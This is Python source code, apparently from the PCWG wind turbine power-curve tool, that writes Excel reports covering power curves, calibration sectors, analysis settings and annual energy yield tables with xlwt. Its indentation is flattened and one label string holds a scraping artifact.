bold_style = xlwt.easyxf('font: bold 1')
no_dp_style = xlwt.easyxf(num_format_str='0')
one_dp_style = xlwt.easyxf(num_format_str='0.0')
two_dp_style = xlwt.easyxf(num_format_str='0.00')
three_dp_style = xlwt.easyxf(num_format_str='0.000')
four_dp_style = xlwt.easyxf(num_format_str='0.0000')
percent_style = xlwt.easyxf(num_format_str='0.00%')
percent_no_dp_style = xlwt.easyxf(num_format_str='0%')
def __init__(self, windSpeedBins, calculated_power_deviation_matrix_dimensions):
self.version = ver.version
self.windSpeedBins = windSpeedBins
self.calculated_power_deviation_matrix_dimensions = calculated_power_deviation_matrix_dimensions
def report(self, path, analysis):
report_power_curve = analysis.hasActualPower
book = xlwt.Workbook()
plotsDir = os.path.dirname(path)
plotter = PNGPlotter()
plotter.plot(analysis, plotsDir)
gradient = colour.ColourGradient(-0.1, 0.1, 0.01, book)
if report_power_curve:
sh = book.add_sheet("PowerCurves", cell_overwrite_ok=True)
settingsSheet = book.add_sheet("Settings", cell_overwrite_ok=True)
self.reportSettings(settingsSheet, analysis)
if report_power_curve:
rowsAfterCurves = []
#rowsAfterCurves.append(self.reportPowerCurve(sh, 0, 0, 'uniqueAnalysisId', analysis.specified_power_curve, analysis)) #needs fixing + move to settings sheet
if analysis.specified_power_curve is not None:
if len(analysis.specified_power_curve.data_frame) != 0:
rowsAfterCurves.append( self.reportPowerCurve(sh, 1, 0, 'Specified', analysis.specified_power_curve, analysis))
if analysis.hasActualPower:
#for name in analysis.residualWindSpeedMatrices:
# residualMatrix = analysis.residualWindSpeedMatrices[name]
#
# if residualMatrix != None:
# self.reportPowerDeviations(book, "ResidualWindSpeed-%s" % name, residualMatrix, gradient)
if analysis.hasShear and analysis.innerMeasuredPowerCurve != None:
rowsAfterCurves.append(self.reportPowerCurve(sh, 1, 5, 'Inner', analysis.innerMeasuredPowerCurve, analysis) )
if analysis.hasShear and analysis.outerMeasuredPowerCurve != None:
rowsAfterCurves.append(self.reportPowerCurve(sh, 1, 10, 'Outer', analysis.outerMeasuredPowerCurve, analysis) )
rowsAfterCurves.append( self.reportPowerCurve(sh, 1, 15, 'All', analysis.allMeasuredPowerCurve, analysis) )
if analysis.turbRenormActive:
rowsAfterCurves.append(self.reportPowerCurve(sh, 1, 20, 'TurbulenceRenormalisedPower', analysis.allMeasuredTurbCorrectedPowerCurve, analysis) )
if analysis.specified_power_curve is not None:
rowAfterCurves = max(rowsAfterCurves) + 5
sh.write(rowAfterCurves-2, 0, "Power Curves Interpolated to Specified Bins:", self.bold_style)
specifiedLevels = analysis.specified_power_curve.data_frame.index
if analysis.hasShear and analysis.innerMeasuredPowerCurve != None:
self.reportInterpolatedPowerCurve(sh, rowAfterCurves, 5, 'Inner', analysis.innerMeasuredPowerCurve, specifiedLevels)
if analysis.hasShear and analysis.outerMeasuredPowerCurve != None:
self.reportInterpolatedPowerCurve(sh, rowAfterCurves, 10, 'Outer', analysis.outerMeasuredPowerCurve, specifiedLevels)
self.reportInterpolatedPowerCurve(sh, rowAfterCurves, 15, 'All', analysis.allMeasuredPowerCurve, specifiedLevels)
if analysis.turbRenormActive:
self.reportInterpolatedPowerCurve(sh, rowAfterCurves, 20, 'TurbulenceRenormalisedPower', analysis.allMeasuredTurbCorrectedPowerCurve, specifiedLevels)
self.reportInterpolatedPowerCurve(sh, rowAfterCurves, (25 if analysis.turbRenormActive else 20), 'DayTime', analysis.dayTimePowerCurve, specifiedLevels)
self.reportInterpolatedPowerCurve(sh, rowAfterCurves, (30 if analysis.turbRenormActive else 25), 'NightTime', analysis.nightTimePowerCurve, specifiedLevels)
self.reportPowerDeviations(book, "Baseline Power Deviations", analysis.baseline_power_deviations, gradient)
#if analysis.rewsActive:
# self.reportPowerDeviations(book, "REWS Deviation", analysis.rewsMatrix, gradient)
for correction_name in analysis.corrections:
correction = analysis.corrections[correction_name]
deviations = analysis.corrected_deviations[correction.correction_name]
sheet_name = get_valid_excel_sheet_name("{0} Power Deviations".format(
correction.short_correction_name), if_too_long_replace={'Power Deviations': 'PowDevs'})
self.reportPowerDeviations(book, sheet_name, deviations, gradient)
if analysis.nominal_wind_speed_distribution.absolute_path is not None:
sh = book.add_sheet("EnergyAnalysis", cell_overwrite_ok=True)
self.report_aep(sh, analysis)
if len(analysis.calibrations) == 1:
calSheet = book.add_sheet("Calibration", cell_overwrite_ok=True)
self.reportCalibration(calSheet,analysis.calibrations[0],timeStepInSeconds = analysis.timeStepInSeconds)
elif len(analysis.calibrations) > 1:
i = 0
for cal in analysis.calibrations:
i += 1
calSheet = book.add_sheet("Calibration_%03d" % i, cell_overwrite_ok=True)
self.reportCalibration(calSheet,cal,timeStepInSeconds = analysis.timeStepInSeconds)
book.save(path)
def reportCalibration(self,sh,calibration,timeStepInSeconds = 600.):
conf, calib = calibration
sh.write(0, 0, "Dataset Name", self.bold_style)
sh.write(1, 0, conf.name)
startRow = 3
col = -14
        belowAbove = 'belowAbove' in calib.calibrationSectorDataframe.columns
col+=16
row=startRow
sh.write(row,col,conf.name, self.bold_style)
sh.write(row,col+1,"Method:"+conf.calibrationMethod, self.bold_style)
row += 1
sh.write(row,col,"Bin", self.bold_style)
sh.write(row,col+1,"Slope", self.bold_style)
sh.write(row,col+2,"Offset", self.bold_style)
if conf.calibrationMethod != 'Specified':
sh.write(row,col+3,"Count", self.bold_style)
sh.write(row,col+4,"Hours", self.bold_style)
if belowAbove:
sh.write(row,col+5,"Count <= 8m/s", self.bold_style)
sh.write(row,col+6,"Hours <= 8m/s", self.bold_style)
sh.write(row,col+7,"Count > 8m/s", self.bold_style)
sh.write(row,col+8,"Hours > 8m/s", self.bold_style)
sh.write(row,col+9,"Speedup at 10m/s", self.bold_style)
sh.write(row,col+10,"% Speedup at 10m/s", self.bold_style)
sh.write(row,col+11,"Filter (Total Hours > 24)", self.bold_style)
sh.write(row,col+12,"Filter (Hours Below/Above 8m/s > 6)", self.bold_style)
sh.write(row,col+13,"Filter (Speedup Change < 2%)", self.bold_style)
sh.write(row,col+14,"Valid Sector", self.bold_style)
row+=1
for key in sorted(calib.calibrationSectorDataframe.index):
sh.write(row,col,float(key), self.bold_style)
sh.write(row,col+1,calib.calibrationSectorDataframe['Slope'][key], self.four_dp_style)
sh.write(row,col+2,calib.calibrationSectorDataframe['Offset'][key], self.four_dp_style)
if conf.calibrationMethod != 'Specified':
if 'Count' in calib.calibrationSectorDataframe.columns:
sh.write(row,col+3,calib.calibrationSectorDataframe['Count'][key], self.no_dp_style)
sh.write(row,col+4,calib.calibrationSectorDataframe['Count'][key]*(timeStepInSeconds/3600.0), self.one_dp_style)
if belowAbove:
ba = calib.calibrationSectorDataframe.loc[key,'belowAbove']
sh.write(row,col+5,ba[0], self.no_dp_style)
sh.write(row,col+6,ba[0]*(timeStepInSeconds/3600.0), self.one_dp_style)
sh.write(row,col+7,ba[1], self.no_dp_style)
sh.write(row,col+8,ba[1]*(timeStepInSeconds/3600.0), self.one_dp_style)
sh.write(row,col+9,calib.calibrationSectorDataframe['SpeedUpAt10'][key], self.four_dp_style)
sh.write(row,col+10,(calib.calibrationSectorDataframe['SpeedUpAt10'][key]-1.0), self.percent_style)
totalHoursValid = calib.getTotalHoursValidity(key, timeStepInSeconds)
sh.write(row,col+11, "TRUE" if totalHoursValid else "FALSE")
if belowAbove:
belowAboveValid = calib.getBelowAboveValidity(key, timeStepInSeconds)
sh.write(row,col+12, "TRUE" if belowAboveValid else "FALSE")
speedUpChangeValid = calib.getSpeedUpChangeValidity(key)
sh.write(row,col+13, "TRUE" if speedUpChangeValid else "FALSE")
sectorValid = calib.getSectorValidity(key, timeStepInSeconds)
sh.write(row,col+14, "TRUE" if sectorValid else "FALSE", self.bold_style)
row += 1
if len(conf.calibrationFilters) > 0:
row += 2
sh.write(row, col, "Calibration Filters", self.bold_style)
row += 1
sh.write(row, col, "Data Column", self.bold_style)
sh.write(row, col+1, "Filter Type", self.bold_style)
sh.write(row, col+2, "Inclusive", self.bold_style)
sh.write(row, col+3, "Filter Value", self.bold_style)
sh.write(row, col+4, "Active", self.bold_style)
row += 1
for filt in conf.calibrationFilters:
                if isinstance(filt, TimeOfDayFilter):
sh.write(row, col, "Time Of Day Filter")
sh.write(row, col + 1, str(filt.startTime))
sh.write(row, col + 2, str(filt.endTime))
sh.write(row, col + 3, str(filt.daysOfTheWeek))
sh.write(row, col + 4, str(filt.months))
else:
sh.write(row, col, filt.column)
sh.write(row, col+1, filt.filterType)
sh.write(row, col+2, filt.inclusive)
sh.write(row, col+3, str(filt))
sh.write(row, col+4, filt.active) # always true if in list...
row += 1
def reportSettings(self, sh, analysis):
config = analysis
sh.write(0, 1, "PCWG Tool Version Number:")
sh.write(0, 2, self.version)
sh.write(0, 3, xlwt.Formula('HYPERLINK("http://www.pcwg.org";"PCWG Website")'))
row = 3
labelColumn = 1
dataColumn = 2
sh.col(labelColumn).width = 256 * 30
sh.col(dataColumn).width = 256 * 50
sh.col(dataColumn+1).width = 256 * 50
        # Corrections
sh.write(row, labelColumn, "Density Correction Active", self.bold_style)
sh.write(row, dataColumn, config.densityCorrectionActive)
row += 1
sh.write(row, labelColumn, "REWS Correction Active", self.bold_style)
sh.write(row, dataColumn, config.rewsActive)
row += 1
sh.write(row, labelColumn, "Turbulence Correction Active", self.bold_style)
sh.write(row, dataColumn, config.turbRenormActive)
row += 1
#General Settings
row += 1
sh.write(row, labelColumn, "Time Step In Seconds", self.bold_style)
sh.write(row, dataColumn, analysis.timeStepInSeconds)
row += 1
sh.write(row, labelColumn, "Power Curve Minimum Count", self.bold_style)
sh.write(row, dataColumn, config.powerCurveMinimumCount)
row += 1
sh.write(row, labelColumn, "Power Curve Mode", self.bold_style)
sh.write(row, dataColumn, config.powerCurveMode)
row += 1
#Inner Range
row += 1
sh.write(row, labelColumn, "Inner Range", self.bold_style)
row += 1
for dimension in config.inner_range_dimensions:
sh.write(row, labelColumn, "Lower {0}".format(dimension.parameter), self.bold_style)
sh.write(row, dataColumn, dimension.lower_limit)
row += 1
sh.write(row, labelColumn, "Upper {0}".format(dimension.parameter), self.bold_style)
sh.write(row, dataColumn, dimension.upper_limit)
row += 1
#Turbine
#row += 1
#sh.write(row, labelColumn, "Turbine", self.bold_style)
#row += 1
#sh.write(row, labelColumn, "Specified Power Curve", self.bold_style)
#sh.write(row, dataColumn, config.specified_power_curve.absolute_path)
#row += 1
#datasets
row += 1
sh.write(row, labelColumn, "Datasets", self.bold_style)
row += 2
for datasetConfig in analysis.datasetConfigs:
sh.write(row, labelColumn, "Name", self.bold_style)
sh.write(row, dataColumn, datasetConfig.name)
row += 1
sh.write(row, labelColumn, "Path", self.bold_style)
sh.write(row, dataColumn, datasetConfig.path)
row += 1
sh.write(row, labelColumn, "Rated Power", self.bold_style)
sh.write(row, dataColumn, datasetConfig.ratedPower)
row += 1
sh.write(row, labelColumn, "HubHeight", self.bold_style)
sh.write(row, dataColumn, datasetConfig.hubHeight)
row += 1
sh.write(row, labelColumn, "Diameter", self.bold_style)
sh.write(row, dataColumn, datasetConfig.diameter)
row += 1
sh.write(row, labelColumn, "Cut In Wind Speed", self.bold_style)
sh.write(row, dataColumn, datasetConfig.cutInWindSpeed)
row += 1
sh.write(row, labelColumn, "Cut Out Wind Speed", self.bold_style)
sh.write(row, dataColumn, datasetConfig.cutOutWindSpeed)
row += 1
sh.write(row, labelColumn, "Start Date", self.bold_style)
sh.write(row, dataColumn, str(datasetConfig.startDate))
row += 1
sh.write(row, labelColumn, "End Date", self.bold_style)
sh.write(row, dataColumn, str(datasetConfig.endDate))
row += 1
sh.write(row, labelColumn, "Hub Wind Speed Mode", self.bold_style)
sh.write(row, dataColumn, datasetConfig.hubWindSpeedMode)
row += 1
sh.write(row, labelColumn, "Density Mode", self.bold_style)
sh.write(row, dataColumn, datasetConfig.densityMode)
row += 2
sh.write(row, labelColumn, "REWS Defined", self.bold_style)
sh.write(row, dataColumn, datasetConfig.rewsDefined)
row += 1
sh.write(row, labelColumn, "Rotor Mode", self.bold_style)
sh.write(row, dataColumn, datasetConfig.rotorMode)
row += 1
sh.write(row, labelColumn, "Hub Mode", self.bold_style)
sh.write(row, dataColumn, datasetConfig.hubMode)
row += 1
sh.write(row, labelColumn, "Number of Rotor Levels", self.bold_style)
sh.write(row, dataColumn, datasetConfig.numberOfRotorLevels)
row += 2
sh.write(row, labelColumn, "Measurements", self.bold_style)
row += 1
sh.write(row, labelColumn, "Input Time Series Path", self.bold_style)
sh.write(row, dataColumn, datasetConfig.input_time_series.absolute_path)
row += 1
sh.write(row, labelColumn, "Date Format", self.bold_style)
sh.write(row, dataColumn, datasetConfig.dateFormat)
row += 1
sh.write(row, labelColumn, "Time Step In Seconds", self.bold_style)
sh.write(row, dataColumn, datasetConfig.timeStepInSeconds)
row += 1
sh.write(row, labelColumn, "Time Stamp", self.bold_style)
sh.write(row, dataColumn, datasetConfig.timeStamp)
row += 1
sh.write(row, labelColumn, "Bad Data Value", self.bold_style)
sh.write(row, dataColumn, datasetConfig.badData)
row += 1
sh.write(row, labelColumn, "Header Rows", self.bold_style)
sh.write(row, dataColumn, datasetConfig.headerRows)
row += 1
sh.write(row, labelColumn, "Turbine Location Wind Speed", self.bold_style)
sh.write(row, dataColumn, datasetConfig.turbineLocationWindSpeed)
row += 1
sh.write(row, labelColumn, "Hub Wind Speed", self.bold_style)
sh.write(row, dataColumn, datasetConfig.hubWindSpeed)
row += 1
sh.write(row, labelColumn, "Hub Turbulence", self.bold_style)
sh.write(row, dataColumn, datasetConfig.hubTurbulence)
row += 1
sh.write(row, labelColumn, "Reference Wind Speed", self.bold_style)
sh.write(row, dataColumn, datasetConfig.referenceWindSpeed)
row += 1
sh.write(row, labelColumn, "Reference Wind Speed Std Dev", self.bold_style)
sh.write(row, dataColumn, datasetConfig.referenceWindSpeedStdDev)
row += 1
sh.write(row, labelColumn, "Reference Wind Direction", self.bold_style)
sh.write(row, dataColumn, datasetConfig.referenceWindDirection)
row += 1
sh.write(row, labelColumn, "Reference Wind Direction Offset", self.bold_style)
sh.write(row, dataColumn, datasetConfig.referenceWindDirectionOffset)
row += 1
sh.write(row, labelColumn, "Density", self.bold_style)
sh.write(row, dataColumn, datasetConfig.density)
row += 1
sh.write(row, labelColumn, "Temperature", self.bold_style)
sh.write(row, dataColumn, datasetConfig.temperature)
row += 1
sh.write(row, labelColumn, "Pressure", self.bold_style)
sh.write(row, dataColumn, datasetConfig.pressure)
row += 1
if len(datasetConfig.turbineShearMeasurements) > 0:
row = self.writeShear(sh,labelColumn,dataColumn,row,datasetConfig.referenceShearMeasurements,'Reference Location ')
row = self.writeShear(sh,labelColumn,dataColumn,row,datasetConfig.turbineShearMeasurements,'Turbine Location ')
else:
row = self.writeShear(sh,labelColumn,dataColumn,row,datasetConfig.referenceShearMeasurements)
sh.write(row, labelColumn, "Power", self.bold_style)
sh.write(row, dataColumn, datasetConfig.power)
row += 2
if datasetConfig.rewsDefined:
sh.write(row, labelColumn, "Profile Levels", self.bold_style)
row += 1
sh.write(row, labelColumn, "Height", self.bold_style)
sh.write(row, dataColumn, "Speed", self.bold_style)
sh.write(row, dataColumn + 1, "Direction", self.bold_style)
row += 1
for height in sorted(datasetConfig.data.windSpeedLevels):
sh.write(row, labelColumn, height)
sh.write(row, dataColumn, datasetConfig.data.windSpeedLevels[height])
if hasattr(datasetConfig.data, 'windDirectionLevels'): # we are not using this in REWS yet
if height in datasetConfig.data.windDirectionLevels:
sh.write(row, dataColumn + 1, datasetConfig.data.windDirectionLevels[height])
row += 1
sh.write(row, labelColumn, "Filters", self.bold_style)
row += 1
sh.write(row, labelColumn, "Data Column", self.bold_style)
sh.write(row, dataColumn, "Filter Type", self.bold_style)
sh.write(row, dataColumn + 1, "Inclusive", self.bold_style)
sh.write(row, dataColumn + 2, "Filter Value", self.bold_style)
sh.write(row, dataColumn + 3, "Active", self.bold_style)
row += 1
for filter in datasetConfig.filters:
if isinstance(filter, TimeOfDayFilter):
sh.write(row, labelColumn, "Time Of Day Filter")
sh.write(row, dataColumn, str(filter.startTime))
sh.write(row, dataColumn + 1, str(filter.endTime))
sh.write(row, dataColumn + 2, str(filter.daysOfTheWeek))
sh.write(row, dataColumn + 3, str(filter.months))
else:
sh.write(row, labelColumn, filter.column)
sh.write(row, dataColumn, filter.filterType)
sh.write(row, dataColumn + 1, filter.inclusive)
sh.write(row, dataColumn + 2, str(filter))
sh.write(row, dataColumn + 3, "True") # always true if in list...
row += 1
def writeShear(self,sh,labelColumn,dataColumn,row,shearList,prefix=""):
i = 0
for sh_meas in shearList:
sh.write(row, labelColumn, prefix+"Shear Measurement " + str(i+1), self.bold_style)
sh.write(row, dataColumn, sh_meas.wind_speed_column)
row += 1
sh.write(row, labelColumn, prefix+"Shear Measurement {0} Height ".format(i+1), self.bold_style)
sh.write(row, dataColumn, sh_meas.height)
row += 1
i += 1
return row
def reportPowerCurve(self, sh, rowOffset, columnOffset, name, powerCurve, analysis):
powerCurveLevels = powerCurve.data_frame.copy()
if powerCurve.wind_speed_column is None:
powerCurveLevels['Specified Wind Speed'] = powerCurveLevels.index
wind_speed_col = 'Specified Wind Speed'
else:
wind_speed_col = powerCurve.wind_speed_column
powerCurveLevels = powerCurveLevels.sort_values(wind_speed_col)
sh.write(rowOffset, columnOffset + 2, name, self.bold_style)
sh.col(columnOffset + 1).width = 256 * 15
sh.col(columnOffset + 2).width = 256 * 15
sh.col(columnOffset + 3).width = 256 * 15
if powerCurve.wind_speed_column is None:
sh.col(columnOffset + 5).width = 256 * 5
else:
sh.col(columnOffset + 4).width = 256 * 15
sh.col(columnOffset + 5).width = 256 * 5
rowOrders = {'Data Count': 4, analysis.actualPower: 2, analysis.hubTurbulence: 3,
analysis.baseline.wind_speed_column: 1, 'Specified Power': 2, 'Specified Turbulence': 3,
'Specified Wind Speed': 1, analysis.measuredTurbulencePower:2, wind_speed_col: 1}
styles = {'Data Count': self.no_dp_style, analysis.baseline.wind_speed_column: self.two_dp_style,
analysis.actualPower: self.no_dp_style, analysis.hubTurbulence: self.percent_no_dp_style,
'Specified Power': self.no_dp_style, 'Specified Turbulence': self.percent_no_dp_style,
'Specified Wind Speed': self.two_dp_style, analysis.measuredTurbulencePower: self.no_dp_style,
wind_speed_col: self.two_dp_style}
for colname in powerCurveLevels.columns:
if colname in styles.keys():
sh.write(rowOffset + 1, columnOffset + rowOrders[colname], colname, self.bold_style)
countRow = 1
for windSpeed in powerCurveLevels.index:
for colname in powerCurveLevels.columns:
if colname in styles.keys():
val = powerCurveLevels[colname][windSpeed]
if type(val) is np.int64:
#xlwt needs numbers to be recognisable as integers or floats; isinstance(np.int64(1), int) returns False.
#Other numpy types (int32, float64, etc) are recognised as int and float appropriately.
val = int(val)
sh.write(rowOffset + countRow + 1, columnOffset + rowOrders[colname], val, styles[colname])
countRow += 1
if hasattr(powerCurve, 'zeroTurbulencePowerCurve'):
countRow += 3
try:
pc = powerCurve.zeroTurbulencePowerCurve.dfPowerLevels
sh.write(rowOffset + countRow, columnOffset + 2, name + ' Zero TI Power Curve', self.bold_style)
countRow += 1
sh.write(rowOffset + countRow, columnOffset + 1, 'Wind Speed', self.bold_style)
sh.write(rowOffset + countRow, columnOffset + 2, 'Power', self.bold_style)
for ws in pc.index:
sh.write(rowOffset + countRow + 1, columnOffset + 1, ws, styles['Specified Wind Speed'])
sh.write(rowOffset + countRow + 1, columnOffset + 2, pc.loc[ws, 'Power'], styles['Specified Wind Speed'])
countRow += 1
except:
sh.write(rowOffset + countRow, columnOffset + 2,'Zero TI Power Curve not calculated successfully for %s power curve.' % name)
countRow+=1
else:
countRow += 3
Status.add("Not reporting zero TI power curve for %s as it is not defined." % (name), verbosity=2)
sh.write(rowOffset + countRow, columnOffset + 2,"Not reporting zero TI power curve for %s as it is not defined." % (name))
countRow+=1
return countRow
def reportInterpolatedPowerCurve(self, sh, rowOffset, columnOffset, name, powerCurve, levels):
sh.write(rowOffset, columnOffset + 2, name, self.bold_style)
sh.write(rowOffset + 1, columnOffset + 1, "Wind Speed", self.bold_style)
sh.write(rowOffset + 1, columnOffset + 2, "Power", self.bold_style)
sh.write(rowOffset + 1, columnOffset + 3, "Turbulence", self.bold_style)
count = 1
for windSpeed in sorted(levels):
sh.write(rowOffset + count + 1, columnOffset + 1, windSpeed, self.two_dp_style)
sh.write(rowOffset + count + 1, columnOffset + 2, float(powerCurve.power_function(windSpeed)), self.no_dp_style)
sh.write(rowOffset + count + 1, columnOffset + 3, float(powerCurve.turbulence_function(windSpeed)), self.percent_no_dp_style)
count += 1
def reportPowerDeviations(self, book, sheetName, powerDeviations, gradient):
sheet = PowerDeviationMatrixSheet(self.calculated_power_deviation_matrix_dimensions)
sheet.report(book, sheetName, powerDeviations, gradient)
def report_aep(self,sh,analysis):
# get tables in PP report form
# Summary of EY acceptance test results:
hrsMultiplier = (analysis.timeStepInSeconds/3600.0)
row = 2
tall_style = xlwt.easyxf('font:height 360;') # 18pt
first_row = sh.row(row)
first_row.set_style(tall_style)
sh.write(row,2, "Reference Turbine", self.bold_style)
sh.write(row,3, "Measured (LCB) Pct of Warranted Annual Energy Yield (%)", self.bold_style)
sh.write(row,4, "Extrapolated Pct of Warranted Annual Energy Yield (%)", self.bold_style)
sh.write(row,5, "Last Complete Bin (LCB)", self.bold_style)
sh.write(row,6, "Direction Sectors Analysed (degrees)", self.bold_style)
sh.write(row,7, "Measured Hours", self.bold_style)
#sh.write(row,8, "Annual Energy Yield Uncertainty as a percentage of the Warranted Annual Yield (%)", self.bold_style)
row += 1
sh.write(row,2, analysis.Name)
sh.write(row,3, analysis.aepCalcLCB.AEP*100, self.two_dp_style)
sh.write(row,4, analysis.aepCalc.AEP*100, self.two_dp_style)
sh.write(row,5, analysis.aepCalcLCB.lcb, self.two_dp_style)
sh.write(row,6, "{mi} - {ma}".format(mi=analysis.dataFrame[analysis.windDirection].min(),ma=analysis.dataFrame[analysis.windDirection].max()))
timeCovered = analysis.allMeasuredPowerCurve.data_frame[analysis.dataCount].sum() * hrsMultiplier
sh.write(row,7, timeCovered, self.two_dp_style)
#sh.write(row,8, "NOT YET CALCULATED")
row += 3
if hasattr(analysis.specified_power_curve,"referenceDensity"):
sh.write_merge(row,row,2,6, "Measured Power Curve\n Reference Air Density = {ref} kg/m^3".format(ref=analysis.specified_power_curve.referenceDensity), self.bold_style)
#sh.write(row,7, "Category A Uncertainty", self.bold_style)
#sh.write(row,8, "Category B Uncertainty", self.bold_style)
#sh.write(row,9, "Category C Uncertainty", self.bold_style)
row += 1
sh.write(row,2, "Bin No", self.bold_style)
sh.write(row,3, "Bin Centre Wind Speed", self.bold_style)
sh.write(row,4, "Hub Height Wind Speed", self.bold_style)
sh.write(row,5, "Power Output", self.bold_style)
sh.write(row,6, "Cp", self.bold_style)
sh.write(row,7, "Qty 10-Min Data", self.bold_style)
sh.write(row,8, "Standard Deviation", self.bold_style)
#sh.write(row,7, "Standard Uncertainty", self.bold_style)
#sh.write(row,8, "Standard Uncertainty", self.bold_style)
#sh.write(row,9, "Standard Uncertainty", self.bold_style)
row += 1
sh.write(row,2, "I", self.bold_style)
sh.write(row,3, "Vi_centre", self.bold_style)
sh.write(row,4, "Vi", self.bold_style)
sh.write(row,5, "Pi", self.bold_style)
sh.write(row,7, "Ni", self.bold_style)
sh.write(row,8, "StDev i", self.bold_style)
#sh.write(row,7, "si", self.bold_style)
#sh.write(row,8, "ui", self.bold_style)
#sh.write(row,9, "uc,I", self.bold_style)
row += 1
sh.write(row,3, "[m/s]", self.bold_style)
sh.write(row,4, "[kW]", self.bold_style)
sh.write(row,8, "[kW]", self.bold_style)
#sh.write(row,7, "[kW]", self.bold_style)
#sh.write(row,8, "[kW]", self.bold_style)
#sh.write(row,9, "[kW]", self.bold_style)
for binNo,ws in enumerate(analysis.allMeasuredPowerCurve.data_frame.index):
if ws <= analysis.aepCalcLCB.lcb and analysis.allMeasuredPowerCurve.data_frame[analysis.dataCount][ws] > 0:
row+=1
sh.write(row,2, binNo+1, self.no_dp_style)
sh.write(row,3, ws, self.one_dp_style)
sh.write(row,4, analysis.allMeasuredPowerCurve.data_frame[analysis.baseline.wind_speed_column][ws], self.two_dp_style)
sh.write(row,5, analysis.allMeasuredPowerCurve.data_frame[analysis.actualPower][ws], self.two_dp_style)
if analysis.powerCoeff in analysis.allMeasuredPowerCurve.data_frame.columns:
sh.write(row,6, analysis.allMeasuredPowerCurve.data_frame[analysis.powerCoeff][ws], self.two_dp_style)
else:
sh.write(row,6, "-", self.no_dp_style)
datCount = analysis.allMeasuredPowerCurve.data_frame[analysis.dataCount][ws]
sh.write(row,7, datCount, self.no_dp_style)
if analysis.powerStandDev in analysis.allMeasuredPowerCurve.data_frame.columns:
sh.write(row,8, analysis.allMeasuredPowerCurve.data_frame[analysis.powerStandDev][ws])
else:
sh.write(row,8, "-", self.no_dp_style)
#sh.write(row,7, "-", self.no_dp_style)
#sh.write(row,8, "~", self.no_dp_style)
#sh.write(row,9, "-", self.no_dp_style)
row+=2
sh.write_merge(row,row,2,5, "More than 180 hours of data:", self.bold_style)
sh.write(row,6, "TRUE" if timeCovered > 180 else "FALSE")
sh.write(row,7, "({0} Hours)".format(round(timeCovered,2)) , self.two_dp_style)
row+=1
if hasattr(analysis,"windSpeedAt85pctX1pnt5"):
sh.write_merge(row,row,2,5, "Largest WindSpeed > {0}:".format(round(analysis.windSpeedAt85pctX1pnt5,2)), self.bold_style)
sh.write(row,6, "TRUE" if analysis.aepCalcLCB.lcb > analysis.windSpeedAt85pctX1pnt5 else "FALSE")
sh.write(row,7, "Threshold is 1.5*([email protected]*RatedPower)")
row+=1
sh.write_merge(row,row,2,5, "AEP Extrap. within 1% of AEP LCB:",self.bold_style)
ans = abs(1-(analysis.aepCalc.AEP/analysis.aepCalcLCB.AEP)) < 0.01
sh.write(row,6, "TRUE" if ans else "FALSE")
if not ans:
sh.write(row,8, analysis.aepCalc.AEP)
sh.write(row,9, analysis.aepCalcLCB.AEP)
if analysis.turbRenormActive:
row += 2
sh.write(row,3, "Turbulence Corrected Measured (LCB) Pct of Warranted Annual Energy Yield (%)", self.bold_style)
sh.write(row,4, "Turbulence Corrected Extrapolated Pct of Warranted Annual Energy Yield (%)", self.bold_style)
sh.write(row+1,3, analysis.turbCorrectedAepCalcLCB.AEP*100, self.two_dp_style)
sh.write(row+1,4, analysis.turbCorrectedAepCalc.AEP*100, self.two_dp_style)
row+=2
sh.write_merge(row,row,3,10,"AEP Distribution",self.bold_style)
row+=1
sh.write_merge(row,row,3,6, "Reference", self.bold_style)
sh.write_merge(row,row,7,10, "Measured", self.bold_style)
row+=1
sh.write(row,2,"Wind Speed",self.bold_style)
sh.write(row,3,'Reference Freq',self.bold_style)
sh.write(row,4,'Reference Power',self.bold_style)
sh.write(row,5,'Reference Power (Resampled)',self.bold_style)
sh.write(row,6,"Reference Energy",self.bold_style)
sh.write(row,7,'Measured Freq',self.bold_style)
sh.write(row,8,'Measured Power',self.bold_style)
sh.write(row,9,'Measured Power (Resampled)',self.bold_style)
sh.write(row,10,"Measured Energy",self.bold_style)
for binNum in analysis.aepCalc.energy_distribution.index:
row+=1
sh.write(row,2,binNum,self.two_dp_style)
sh.write(row,3,analysis.aepCalc.energy_distribution.loc[binNum,"Reference_Freq"] ,self.four_dp_style)
sh.write(row,4,analysis.aepCalc.energy_distribution.loc[binNum,"Reference_Upper"] ,self.four_dp_style)
sh.write(row,5,analysis.aepCalc.energy_distribution.loc[binNum,"Reference_Power"] ,self.four_dp_style)
sh.write(row,6,analysis.aepCalc.energy_distribution.loc[binNum,"Reference_Energy"] ,self.four_dp_style)
sh.write(row,7,analysis.aepCalc.energy_distribution.loc[binNum,"Measured_Freq"] ,self.four_dp_style)
sh.write(row,8,analysis.aepCalc.energy_distribution.loc[binNum,"Measured_Upper"] ,self.four_dp_style)
sh.write(row,9,analysis.aepCalc.energy_distribution.loc[binNum,"Measured_Power"] ,self.four_dp_style)
sh.write(row,10,analysis.aepCalc.energy_distribution.loc[binNum,"Measured_Energy"] ,self.four_dp_style)
row+=3
def write_power_curves(self):
Status.add("Wind Speed\tSpecified\tInner\tOuter\tAll", verbosity=2)
for i in range(self.windSpeedBins.numberOfBins):
windSpeed = self.windSpeedBins.binCenterByIndex(i)
text = "%0.4f\t" % windSpeed
if windSpeed in self.specified_power_curve.data_frame:
text += "%0.4f\t" % self.specified_power_curve.data_frame[windSpeed]
else:
text += "\t"
if windSpeed in self.innerMeasuredPowerCurve.data_frame:
text += "%0.4f\t" % self.innerMeasuredPowerCurve.data_frame[windSpeed]
else:
text += "\t"
if windSpeed in self.outerMeasuredPowerCurve.data_frame:
text += "%0.4f\t" % self.outerMeasuredPowerCurve.data_frame[windSpeed]
else:
text += "\t"
if windSpeed in self.allMeasuredPowerCurve.data_frame:
text += "%0.4f\t" % self.allMeasuredPowerCurve.data_frame[windSpeed]
else:
text += "\t"
Status.add(text, verbosity=2)
def write_power_deviation_matrix(self):
for j in reversed(range(self.turbulenceBins.numberOfBins)):
turbulence = self.turbulenceBins.binCenterByIndex(j)
text = "%f\t" % turbulence
for i in range(self.windSpeedBins.numberOfBins):
windSpeed = self.windSpeedBins.binCenterByIndex(i)
if windSpeed in self.powerDeviations:
if turbulence in self.powerDeviations[windSpeed]:
text += "%f\t" % self.powerDeviations[windSpeed][turbulence]
else:
text += "\t"
else:
text += "\t"
Status.add(text, verbosity=2)
text = "\t"
for i in range(self.windSpeedBins.numberOfBins):
text += "%f\t" % self.windSpeedBins.binCenterByIndex(i)
Status.add(text, verbosity=2)
def report_scatter_metric(self,sh,analysis,row, turbRenormActive):
row += 5
sh.write(row, 1, "Scatter Metric Before TI Renormalisation:", self.bold_style)
